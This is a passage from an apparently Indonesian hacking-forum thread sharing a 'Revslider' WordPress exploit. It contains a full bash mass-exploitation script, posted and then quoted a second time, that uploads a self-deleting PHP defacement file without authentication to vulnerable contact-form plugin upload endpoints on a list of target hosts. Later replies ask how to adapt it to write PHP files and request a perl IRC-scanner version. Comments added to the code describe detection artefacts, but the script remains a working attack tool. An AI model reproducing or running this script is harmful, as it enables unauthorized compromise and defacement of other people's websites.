[Share] [BASH] Revslider Exploit Wordpress
#11
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya

kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?

coba yang ini om Contact Form
Code:
#!/bin/bash
#
# Batch script as posted in the thread. It reads a file of hostnames and, for
# each host, sends a multipart POST (no credentials) to a contact-form
# plugin's fileupload endpoint, then requests the uploaded rr.php and looks
# for marker pages it is expected to have written.
#
# Artefacts a defender can look for, all taken from this script:
#   - POST to /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
#     or /components/com_creativecontactform/fileupload/index.php, followed by
#     a GET of .../fileupload/files/rr.php from the same client
#   - files named nyet.htm in the document root, images/ and wp-content/
#   - rr.php deletes itself after running (unlink(__FILE__)), so the web
#     server access log, not the file system, holds the trace of the upload
# NOTE(review): removing or updating the affected plugin and disabling PHP
# execution in upload directories addresses this class of issue.
#

# Prompt for the path of the host list; stop if it is not a regular file.
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
# Per-run numeric prefix for the scratch files kept under tmp/.
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
# log/ is created here but never written to in the visible script.
if [ ! -d log ];then
mkdir log
fi

# Generate rr.php once, in the working directory. The heredoc delimiter is
# unquoted, so the \$ escapes are what keep the PHP variables literal.
# The PHP writes one static HTML page (title "Creed") to nyet.htm,
# images/nyet.htm and wp-content/nyet.htm under DOCUMENT_ROOT, prints
# md5("creed"), then removes itself.
if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi

# CekDFC URL FLAG
# Fetches URL into tmp/${FCK}gck.txt and reports whether the body contains
# the string "Creed" (case-insensitive), i.e. whether the marker page is
# being served.
# Globals:   FCK (read), czone (written), gck (written)
# Arguments: $1 - URL to fetch; $2 - when 1, the URL is also saved to
#            tmp/${FCK}empes.txt
# Outputs:   " + File found URL" on stdout when the marker is present
CekDFC(){
czone=${2}
# Clear scratch files from a previous call. hasil.txt is not written anywhere
# in the visible script.
if [ -f tmp/${FCK}gck.txt ];then
  rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
  rm -f tmp/${FCK}hasil.txt
fi
# Fixed MSIE 9 User-Agent; this exact string is usable as a log search term.
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
  if [ -f tmp/${FCK}gck.txt ];then
    cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
    if [ $gck -eq 0 ];then
     echo " + File found $1"
     if [ $czone -eq 1 ];then
      echo "${1}" > tmp/${FCK}empes.txt
      # NOTE(review): this function has no loop of its own; what break does
      # here depends on the caller's loop and on the bash version.
      break
     fi
    fi
  fi
}

# CekDFC5 URL
# Requests URL (the uploaded rr.php) and saves the response to
# tmp/${FCK}w00t. If the response contains the fixed hex string below, the
# upload is reported as successful and three marker URLs are checked.
# Globals:   FCK (read), HOSTX (read), cwot (written)
# Arguments: $1 - URL of the uploaded PHP file
# Outputs:   " + Exploit Success" on stdout when the hex string is found
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
# Presumably the value rr.php prints with md5("creed") - not verified here.
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
   if [ $cwot -eq 0 ];then
    echo " + Exploit Success"
    # rr.php writes to the document root, images/ and wp-content/; the list
    # checked here has components/ instead of images/.
    CekDFC "http://${HOSTX}/nyet.htm" 1
    CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
    CekDFC "http://${HOSTX}/components/nyet.htm" 1
   fi
}

# SexyWP
# WordPress branch: sends a multipart POST to the sexy-contact-form plugin's
# fileupload/index.php on HOSTX, then has CekDFC5 request files/rr.php from
# the same plugin directory. The request carries no cookies or credentials.
# The -F field below is reproduced exactly as it is rendered on the page.
# Globals:   FCK (read), HOSTX (read)
# Detection: a POST to this path followed by a GET of .../files/rr.php, with
#            the Firefox/3.0.16 User-Agent string used below.
SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}

# SexyJM
# Joomla branch: same request as SexyWP, aimed at the com_creativecontactform
# component's fileupload/index.php, followed by a CekDFC5 check of
# fileupload/files/rr.php. The request carries no cookies or credentials.
# The -F field below is reproduced exactly as it is rendered on the page.
# Globals:   FCK (read), HOSTX (read)
# Detection: a POST to this path followed by a GET of .../files/rr.php, with
#            the Firefox/3.0.16 User-Agent string used below.
SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}

# VulnSexy
# Per-host entry point. Fetches http://HOSTX/index.php and picks a branch by
# a plain string test: a body containing "wp-content" goes to SexyWP, every
# other response (including non-Joomla sites) goes to SexyJM.
# Globals:   FCK (read), HOSTX (read), csexy (written)
# Outputs:   " + Wordpress Detect" or " + Joomla Detect" on stdout
VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
# No output file was produced: drop this run's scratch files.
if [ ! -f tmp/${FCK}cvuln ];then
   rm -f tmp/${FCK}*
   # NOTE(review): continue is issued inside a function that has no loop of
   # its own; its effect depends on the caller's loop and the bash version.
   continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
   echo " + Wordpress Detect"
   SexyWP
   else
   echo " + Joomla Detect"
   SexyJM
fi
}

# Main loop: the list file is word-split, so every whitespace-separated token
# is taken as a hostname. The functions read it through the global HOSTX, and
# all requests are built as plain http:// URLs.
for HOSTX in `cat $list`
do
VulnSexy
done
I'm Not Jomblo | I'm Not Single | I'm Just Linuxer


#12
(05-19-2015, 04:27 AM)Creed Wrote:
(05-18-2015, 11:56 PM)flips Wrote: wihh makasih om shareannya

kalo boleh tau ini cara kerja exploitnya gmn ya ? oiya itu kan write cssnya kalo misalkan mau write file yang php gimana mas ?

coba yang ini om Contact Form

Code:
#!/bin/bash
#
# Quoted copy of the script posted earlier in the thread. It reads a file of
# hostnames and, for each host, sends a multipart POST (no credentials) to a
# contact-form plugin's fileupload endpoint, then requests the uploaded
# rr.php and looks for marker pages it is expected to have written.
#
# Artefacts a defender can look for, all taken from this script:
#   - POST to /wp-content/plugins/sexy-contact-form/includes/fileupload/index.php
#     or /components/com_creativecontactform/fileupload/index.php, followed by
#     a GET of .../fileupload/files/rr.php from the same client
#   - files named nyet.htm in the document root, images/ and wp-content/
#   - rr.php deletes itself after running (unlink(__FILE__)), so the web
#     server access log, not the file system, holds the trace of the upload
#

# Prompt for the path of the host list; stop if it is not a regular file.
read -p "List Target = " list
if [ ! -f $list ];then
echo " + List target tdk ada cuk.. "
exit
fi
# Per-run numeric prefix for the scratch files kept under tmp/.
FCK=$RANDOM
if [ ! -d tmp ];then
mkdir tmp
fi
# log/ is created here but never written to in the visible script.
if [ ! -d log ];then
mkdir log
fi

# Generate rr.php once, in the working directory. The heredoc delimiter is
# unquoted, so the \$ escapes are what keep the PHP variables literal.
# The PHP writes one static HTML page (title "Creed") to nyet.htm,
# images/nyet.htm and wp-content/nyet.htm under DOCUMENT_ROOT, prints
# md5("creed"), then removes itself.
if [ ! -f rr.php ];then
cat > rr.php <<_EOF
<?php \$file="<title>Creed</title><center><div id=q>Creed<br><font size=2>Creed <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}";  \$path = \$_SERVER["DOCUMENT_ROOT"];  \$r=fopen(\$path."/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/images/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);\$r=fopen(\$path."/wp-content/nyet.htm", "w");fwrite(\$r,\$file);fclose(\$r);echo md5("creed");unlink(__FILE__); ?>
_EOF
fi

# CekDFC URL FLAG
# Fetches URL into tmp/${FCK}gck.txt and reports whether the body contains
# the string "Creed" (case-insensitive), i.e. whether the marker page is
# being served.
# Globals:   FCK (read), czone (written), gck (written)
# Arguments: $1 - URL to fetch; $2 - when 1, the URL is also saved to
#            tmp/${FCK}empes.txt
# Outputs:   " + File found URL" on stdout when the marker is present
CekDFC(){
czone=${2}
# Clear scratch files from a previous call. hasil.txt is not written anywhere
# in the visible script.
if [ -f tmp/${FCK}gck.txt ];then
 rm -f tmp/${FCK}gck.txt
fi
if [ -f tmp/${FCK}hasil.txt ];then
 rm -f tmp/${FCK}hasil.txt
fi
# Fixed MSIE 9 User-Agent; this exact string is usable as a log search term.
curl --silent --max-time 10 --connect-timeout 10 -A "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0)" "${1}" -o tmp/${FCK}gck.txt
 if [ -f tmp/${FCK}gck.txt ];then
   cat tmp/${FCK}gck.txt | grep -i "Creed" >/dev/null;gck=$?
   if [ $gck -eq 0 ];then
    echo " + File found $1"
    if [ $czone -eq 1 ];then
     echo "${1}" > tmp/${FCK}empes.txt
     # NOTE(review): this function has no loop of its own; what break does
     # here depends on the caller's loop and on the bash version.
     break
    fi
   fi
 fi
}

# CekDFC5 URL
# Requests URL (the uploaded rr.php) and saves the response to
# tmp/${FCK}w00t. If the response contains the fixed hex string below, the
# upload is reported as successful and three marker URLs are checked.
# Globals:   FCK (read), HOSTX (read), cwot (written)
# Arguments: $1 - URL of the uploaded PHP file
# Outputs:   " + Exploit Success" on stdout when the hex string is found
CekDFC5(){
#echo " - check file $1"
curl --silent --max-time 10 --connect-timeout 10 "${1}" -o tmp/${FCK}w00t
# Presumably the value rr.php prints with md5("creed") - not verified here.
cat tmp/${FCK}w00t | grep -i "38db7ce1861ee11b6a231c764662b68a" >/dev/null;cwot=$?
  if [ $cwot -eq 0 ];then
   echo " + Exploit Success"
   # rr.php writes to the document root, images/ and wp-content/; the list
   # checked here has components/ instead of images/.
   CekDFC "http://${HOSTX}/nyet.htm" 1
   CekDFC "http://${HOSTX}/wp-content/nyet.htm" 1
   CekDFC "http://${HOSTX}/components/nyet.htm" 1
  fi
}

# SexyWP
# WordPress branch: sends a multipart POST to the sexy-contact-form plugin's
# fileupload/index.php on HOSTX, then has CekDFC5 request files/rr.php from
# the same plugin directory. The request carries no cookies or credentials.
# The -F field below is reproduced exactly as it is rendered on the page.
# Globals:   FCK (read), HOSTX (read)
# Detection: a POST to this path followed by a GET of .../files/rr.php, with
#            the Firefox/3.0.16 User-Agent string used below.
SexyWP(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php"
CekDFC5 "http://${HOSTX}/wp-content/plugins/sexy-contact-form/includes/fileupload/files/rr.php"
}

# SexyJM
# Joomla branch: same request as SexyWP, aimed at the com_creativecontactform
# component's fileupload/index.php, followed by a CekDFC5 check of
# fileupload/files/rr.php. The request carries no cookies or credentials.
# The -F field below is reproduced exactly as it is rendered on the page.
# Globals:   FCK (read), HOSTX (read)
# Detection: a POST to this path followed by a GET of .../files/rr.php, with
#            the Firefox/3.0.16 User-Agent string used below.
SexyJM(){
curl --silent --max-time 10 --connect-timeout 10 -o tmp/${FCK}resp.txt \
-A "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)" \
-F "files[][email protected]" \
--request POST  "http://${HOSTX}/components/com_creativecontactform/fileupload/index.php"
CekDFC5 "http://${HOSTX}/components/com_creativecontactform/fileupload/files/rr.php"
}

# VulnSexy
# Per-host entry point. Fetches http://HOSTX/index.php and picks a branch by
# a plain string test: a body containing "wp-content" goes to SexyWP, every
# other response (including non-Joomla sites) goes to SexyJM.
# Globals:   FCK (read), HOSTX (read), csexy (written)
# Outputs:   " + Wordpress Detect" or " + Joomla Detect" on stdout
VulnSexy(){
curl --silent --max-time 10 --connect-timeout 10 "http://${HOSTX}/index.php" -o tmp/${FCK}cvuln
# No output file was produced: drop this run's scratch files.
if [ ! -f tmp/${FCK}cvuln ];then
  rm -f tmp/${FCK}*
  # NOTE(review): continue is issued inside a function that has no loop of
  # its own; its effect depends on the caller's loop and the bash version.
  continue
fi
cat tmp/${FCK}cvuln | grep "wp-content" >/dev/null;csexy=$?
if [ $csexy -eq 0 ];then
  echo " + Wordpress Detect"
  SexyWP
  else
  echo " + Joomla Detect"
  SexyJM
fi
}

# Main loop: the list file is word-split, so every whitespace-separated token
# is taken as a hostname. The functions read it through the global HOSTX, and
# all requests are built as plain http:// URLs.
for HOSTX in `cat $list`
do
VulnSexy
done

itu bukan revslider lagi ya?
kalo boleh tau itu gmn ya mas cara jalan exploitnya biar bisa tak modif2 wkkw

thx before

#13
who have the revslider exploit "perl version" for irc scanner ? tnx a lot

#14
i have bro
but has errors when execution

[Image: do.php?img=14]

#15
Wah wah. Boleh dicoba nih. Nice share Big Grin

#16
itu bisa dpke WP versi brpa aja ya?
btw, nice share.
antonl | Psycho Security | [email protected]





